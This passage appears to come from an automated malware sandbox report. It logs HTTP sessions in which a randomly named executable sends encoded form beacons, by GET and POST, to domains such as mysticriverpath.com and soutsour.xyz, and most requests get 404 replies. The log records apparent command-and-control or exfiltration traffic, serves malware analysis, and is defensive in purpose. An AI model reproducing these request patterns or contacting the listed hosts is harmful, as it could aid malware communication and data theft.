                                              Data Raw: 67 4e 6c 3d 2f 33 4e 64 58 2f 63 51 38 47 30 44 43 31 62 73 71 2f 4d 67 6c 78 51 63 59 48 43 46 76 69 72 66 33 49 2b 6c 68 2f 67 6c 5a 31 75 32 44 74 4d 37 74 63 79 56 51 41 74 44 46 6d 64 6b 37 32 4e 4e 58 52 41 44 51 5a 74 55 6a 33 55 65 64 2f 42 61 6a 63 6f 42 36 52 68 66 55 37 54 6c 79 75 38 4c 55 71 4e 4c 76 70 4e 52 51 39 55 38 4d 44 49 33 72 71 66 52 43 6c 73 52 31 32 6d 53 58 49 6a 2f 34 72 68 66 4b 4e 71 49 78 6e 5a 77 75 38 31 6a 50 75 67 71 54 46 4e 72 37 46 64 34 77 4c 32 45 34 50 44 55 4e 65 41 77 51 4f 32 71 69 6a 54 63 35 35 6d 57 56 49 5a 39 45 58 61 54 7a 48 74 50 50 59 36 2f 2b 74 69 2b 35 75 44 45 47 59 55 34 6d 6e 37 53 30 43 4d 58 72 34 55 70 4d 35 66 4c 2f 38 61 53 44 6e 50 58 35 33 53 32 42 64 77 57 6d 6c 7a 47 58 76 44 78 79 38 74 65 4e 4c 36 74 72 45 64 54 44 78 44 67 44 76 34 6a 6d 71 44 72 6e 6f 41 38 78 31 36 36 69 4f 53 65 4a 73 43 6d 34 46 50 32 74 77 64 4a 4c 78 59 35 74 6c 53 4d 39 52 4b 34 37 33 53 72 6a 76 59 67 34 46 41 42 5a 2b 4e 4a 46 52 79 63 6b 74 74 79 4c 54 [TRUNCATED]
                                              Data Ascii: gNl=/3NdX/cQ8G0DC1bsq/MglxQcYHCFvirf3I+lh/glZ1u2DtM7tcyVQAtDFmdk72NNXRADQZtUj3Ued/BajcoB6RhfU7Tlyu8LUqNLvpNRQ9U8MDI3rqfRClsR12mSXIj/4rhfKNqIxnZwu81jPugqTFNr7Fd4wL2E4PDUNeAwQO2qijTc55mWVIZ9EXaTzHtPPY6/+ti+5uDEGYU4mn7S0CMXr4UpM5fL/8aSDnPX53S2BdwWmlzGXvDxy8teNL6trEdTDxDgDv4jmqDrnoA8x166iOSeJsCm4FP2twdJLxY5tlSM9RK473SrjvYg4FABZ+NJFRyckttyLTdV2RalaeXa7ezF83MauARxg4FabZ+UMrGOtR27o4CAr8FRxPgCLyz+kohFhkcNNSx5RekvWjGLkmbR1Veya6DDTsoCKoHcltkSSP4WVXzUDWKpnQSebXMRWS5y684z08d2DXfHGotR8M4AeRhbSEYWt0eromAy6OlajK5+LdrG0DMdV/dv4uB+JjdjwU/iWGz6N4y+91BZsnJTXiCHTKGZn+hv3ygRhJO3Iw6V3bRSX467L3ewHZRsAJOn3EKI6l3RnVX6c8Hku3+LlhAu0NpsPIcONVPcHkYjIEf0XbqiW0tH9WOAVIHc4cqVavDCBAhzQXMCxVHkMfJIp5DhZ47+aNCw+c7oeaf+3UiiIvSdEIxEv9/UMeG52FN/WTHJgqQXpvQv7icOkDOmpxbdMmCaMzybtHD2Zh2iadIOyOGymBVmuqr+jXO0/vyIocwvgHaNOYcgZuc2j+RFdwdX2i8X5GIUMkOXPYxiXcZdzTnFNfXZnP141NwWkt81REiQaH+0Nh+BpIx1GwPgCjGEr5d+0Uu8x0B+2gP2TlPOigu5hkcmukInnVYIbyyNmAlDIqtEZ1l+hsSWz+Cf5xNbU5Tmza+DEWJsjjIFzf3zK8tQBv4OwP1RjquUzwF89YEEBISFSlP2yOdgzHsoBmFrmDsSyuf3IsOln+IB [TRUNCATED]
                                              Jul 8, 2024 09:34:50.486083031 CEST533INHTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:34:50 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.449762203.161.41.207805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:52.421475887 CEST451OUTGET /etzb/?gNl=y1l9UKEI/lQ7TFqul8cFoyc9amTFojzHvoSS/tM0SGjjEe4pj9aFUBRbEUlPxRBYTwZ9epMSinUSWJlauv4T6Qd4dJfAkKACIvt4qodfW5IqShEDlLijX08=&QdC=AFMh5N HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.soutsour.xyz
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:35:08.276060104 CEST548INHTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:35:08 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.449763216.194.173.237805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:13.564702034 CEST737OUTPOST /0guv/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.mysticriverpath.com
                                              Origin: http://www.mysticriverpath.com
                                              Referer: http://www.mysticriverpath.com/0guv/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 70 71 75 65 2b 72 30 42 47 2f 6f 37 55 6c 46 71 59 64 39 6f 47 6c 62 6e 6c 76 69 64 79 73 4e 44 76 6b 34 4c 4a 6b 39 74 6a 44 76 78 32 54 4c 69 57 62 6a 49 70 2b 41 79 32 74 45 51 6f 63 73 61 55 6e 6a 42 5a 69 53 32 41 70 48 4a 53 30 36 35 42 34 2f 37 37 57 50 59 4b 43 4a 47 42 58 41 32 59 79 55 66 33 78 52 39 36 77 55 4c 68 55 6f 36 34 71 4b 37 46 32 6a 33 6e 6c 68 38 70 6f 34 54 51 56 4c 6d 65 51 4c 48 6d 72 34 4c 31 4a 72 32 74 46 57 34 74 45 30 52 6b 67 6d 78 44 51 5a 75 67 30 6d 47 73 77 69 70 31 57 38 6d 5a 44 35 42 76 4d 6c 45 35 30 42 70 39 2b 73 4f 2b 30 70 31 5a 77 3d 3d
                                              Data Ascii: gNl=pque+r0BG/o7UlFqYd9oGlbnlvidysNDvk4LJk9tjDvx2TLiWbjIp+Ay2tEQocsaUnjBZiS2ApHJS065B4/77WPYKCJGBXA2YyUf3xR96wULhUo64qK7F2j3nlh8po4TQVLmeQLHmr4L1Jr2tFW4tE0RkgmxDQZug0mGswip1W8mZD5BvMlE50Bp9+sO+0p1Zw==
                                              Jul 8, 2024 09:35:14.146084070 CEST479INHTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:35:14 GMT
                                              Server: Apache
                                              Content-Length: 315
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.449764216.194.173.237805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:16.103528976 CEST757OUTPOST /0guv/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.mysticriverpath.com
                                              Origin: http://www.mysticriverpath.com
                                              Referer: http://www.mysticriverpath.com/0guv/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 70 71 75 65 2b 72 30 42 47 2f 6f 37 53 32 4e 71 61 2f 56 6f 45 46 62 6b 35 66 69 64 70 38 4d 4b 76 6b 30 4c 4a 6c 49 6f 6a 51 4c 78 7a 43 37 69 56 61 6a 49 71 2b 41 79 6a 64 46 61 6e 38 74 33 55 6e 75 68 5a 6a 75 32 41 70 44 4a 53 78 2b 35 41 50 54 34 35 47 50 47 54 79 4a 41 50 33 41 32 59 79 55 66 33 78 46 48 36 77 4d 4c 67 6c 34 36 36 4f 6d 6b 49 57 6a 34 69 56 68 38 74 6f 34 58 51 56 4b 31 65 52 48 74 6d 70 77 4c 31 4d 58 32 75 55 57 37 6d 45 30 62 71 41 6e 67 51 53 38 4b 68 33 57 4e 72 53 53 58 33 55 39 48 63 46 6f 62 2b 39 45 54 72 30 6c 61 67 35 6c 36 7a 33 55 38 43 77 47 38 64 34 79 2b 45 59 48 47 74 6e 71 2f 31 58 71 7a 51 70 38 3d
                                              Data Ascii: gNl=pque+r0BG/o7S2Nqa/VoEFbk5fidp8MKvk0LJlIojQLxzC7iVajIq+AyjdFan8t3UnuhZju2ApDJSx+5APT45GPGTyJAP3A2YyUf3xFH6wMLgl466OmkIWj4iVh8to4XQVK1eRHtmpwL1MX2uUW7mE0bqAngQS8Kh3WNrSSX3U9HcFob+9ETr0lag5l6z3U8CwG8d4y+EYHGtnq/1XqzQp8=
                                              Jul 8, 2024 09:35:16.693977118 CEST479INHTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:35:16 GMT
                                              Server: Apache
                                              Content-Length: 315
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.449765216.194.173.237805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:18.636713982 CEST10839OUTPOST /0guv/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.mysticriverpath.com
                                              Origin: http://www.mysticriverpath.com
                                              Referer: http://www.mysticriverpath.com/0guv/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 70 71 75 65 2b 72 30 42 47 2f 6f 37 53 32 4e 71 61 2f 56 6f 45 46 62 6b 35 66 69 64 70 38 4d 4b 76 6b 30 4c 4a 6c 49 6f 6a 51 44 78 76 67 6a 69 56 35 4c 49 72 2b 41 79 2f 4e 46 5a 6e 38 73 31 55 6e 32 2b 5a 6a 6a 42 41 72 72 4a 64 33 43 35 51 72 48 34 7a 47 50 47 62 53 4a 42 42 58 42 79 59 79 45 62 33 78 56 48 36 77 4d 4c 67 6d 77 36 7a 36 4b 6b 62 47 6a 33 6e 6c 68 4b 70 6f 34 7a 51 56 53 6c 65 52 54 58 6e 64 45 4c 32 74 6e 32 39 57 2b 37 6b 6b 30 56 36 51 6e 34 51 53 41 56 68 33 62 30 72 53 4b 39 33 57 68 48 52 41 4d 43 6d 2f 59 6c 2f 46 55 44 69 4a 64 53 74 47 49 61 4c 42 36 63 54 74 53 43 65 4c 65 6b 71 77 62 47 78 30 43 73 43 73 4e 57 34 43 32 69 65 62 6e 6a 44 62 48 73 54 47 39 45 44 71 35 75 55 2b 50 31 64 73 33 5a 57 52 2b 4c 44 39 4b 51 36 36 6c 52 4f 51 6d 71 44 56 43 30 50 67 4a 4a 4a 59 52 70 41 39 44 4a 78 51 2f 2b 62 66 56 77 70 2b 41 37 73 74 78 4c 59 59 4a 31 55 75 55 4d 6c 4a 66 62 5a 6c 39 54 36 41 49 48 6d 47 41 78 6e 6b 44 6a 73 58 30 53 33 38 75 74 5a 55 33 62 33 49 [TRUNCATED]
                                              Data Ascii: gNl=pque+r0BG/o7S2Nqa/VoEFbk5fidp8MKvk0LJlIojQDxvgjiV5LIr+Ay/NFZn8s1Un2+ZjjBArrJd3C5QrH4zGPGbSJBBXByYyEb3xVH6wMLgmw6z6KkbGj3nlhKpo4zQVSleRTXndEL2tn29W+7kk0V6Qn4QSAVh3b0rSK93WhHRAMCm/Yl/FUDiJdStGIaLB6cTtSCeLekqwbGx0CsCsNW4C2iebnjDbHsTG9EDq5uU+P1ds3ZWR+LD9KQ66lROQmqDVC0PgJJJYRpA9DJxQ/+bfVwp+A7stxLYYJ1UuUMlJfbZl9T6AIHmGAxnkDjsX0S38utZU3b3I46MgOjz1MrgL1LEQ3Z+88Uzh72YEfFc+igHZUyPtKIRfMmORVpzyS3WN/Cy+t6XCzCjAQPsz0au2gIAV4Wai8RoF55Al4o60cxy5ziLjsLuJg3QNPzUK+WoFAodNOYIOkATSjZM1WZoWHnmM5b3JgDwZQNDW9KnrdkPzSEwrrA+uuZvPYNAAsC+XB1RFlhSn1E13Gmoj+++WMcaN5kNQzyP9zxq7J6IDJuvRSW1Z/CFGoDki0+SKGX8edsWmnm/AoHD82udNXGvATfZvBlk2C0tdZCt3DDCzW8Zdoyhs8fEhfS2PjDgMM8Ki6WCwsUGOZLLB/b3k1dV1BW5mSoPBN2DjNo9zex0et7bSoeGU6t4WoG1nl2DrK2k0vNaQo8VdgeXvh2U8zZxTrwHVcqg5JBniD7xv5SUk3ovAp6evxsseMCmEVaWDXNBm6oyvqXwGkIZYPPRNG7jEhEXmI7Bxi2OcZB5jalRhGVL19jgx81E3NCkM8ek5Qsj+1FuezPglLfthZCxq+t0lAnBG8T9TFjtQDs92FMQbsXB2B4VepgoVXCyNIG8JJTX3AzpW5wcfIJKMtPvnMDvDx8UTR1J6Lb8CcpZbIv6iHKP15+6hovYeK9Oux7RqF4NKWDNc0y5B80h9+Huqf4pfPGU0dq3oce1SqV2VwqJfYw [TRUNCATED]
                                              Jul 8, 2024 09:35:19.234251022 CEST479INHTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:35:19 GMT
                                              Server: Apache
                                              Content-Length: 315
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.449766216.194.173.237805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:21.171313047 CEST458OUTGET /0guv/?QdC=AFMh5N&gNl=koG+9f1JLs4iU3gpYtYeL1r94dP8/9FWskMDX1FP+QK1lg22bIT8kucy8PYjp4kPLlPGQE/9ELG4RRacCoDP+inEdxRGBXRQHVAT/D1/4SMcq2gI6by2YHg= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.mysticriverpath.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:35:21.744081020 CEST479INHTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:35:21 GMT
                                              Server: Apache
                                              Content-Length: 315
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.4497673.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:26.812578917 CEST722OUTPOST /g9bf/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.mscuration.com
                                              Origin: http://www.mscuration.com
                                              Referer: http://www.mscuration.com/g9bf/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 6f 51 62 32 30 54 5a 70 65 62 67 4a 52 47 77 44 79 4f 42 2f 37 6b 57 70 75 69 71 32 69 2b 4e 6e 39 65 4f 58 33 76 52 33 6e 6d 31 33 35 70 39 7a 44 5a 58 75 34 65 38 43 52 47 76 62 78 45 62 38 70 67 61 4a 6f 32 6e 30 53 59 67 57 54 6b 31 35 57 6e 67 63 2b 4a 31 71 61 49 68 50 4c 2b 4d 4e 36 38 46 54 54 55 6d 64 59 4e 77 36 54 77 2f 39 43 50 39 72 71 6f 6b 2b 41 5a 7a 6a 59 7a 64 68 6c 39 47 73 7a 70 45 4e 65 74 61 77 6e 56 4b 41 71 77 53 35 6d 6a 2f 37 59 4b 6f 52 76 43 66 7a 68 31 4b 53 68 52 49 7a 65 30 63 39 4c 30 78 49 39 69 75 33 6e 69 65 75 68 73 4c 53 79 6a 61 56 64 51 3d 3d
                                              Data Ascii: gNl=oQb20TZpebgJRGwDyOB/7kWpuiq2i+Nn9eOX3vR3nm135p9zDZXu4e8CRGvbxEb8pgaJo2n0SYgWTk15Wngc+J1qaIhPL+MN68FTTUmdYNw6Tw/9CP9rqok+AZzjYzdhl9GszpENetawnVKAqwS5mj/7YKoRvCfzh1KShRIze0c9L0xI9iu3nieuhsLSyjaVdQ==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.4497683.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
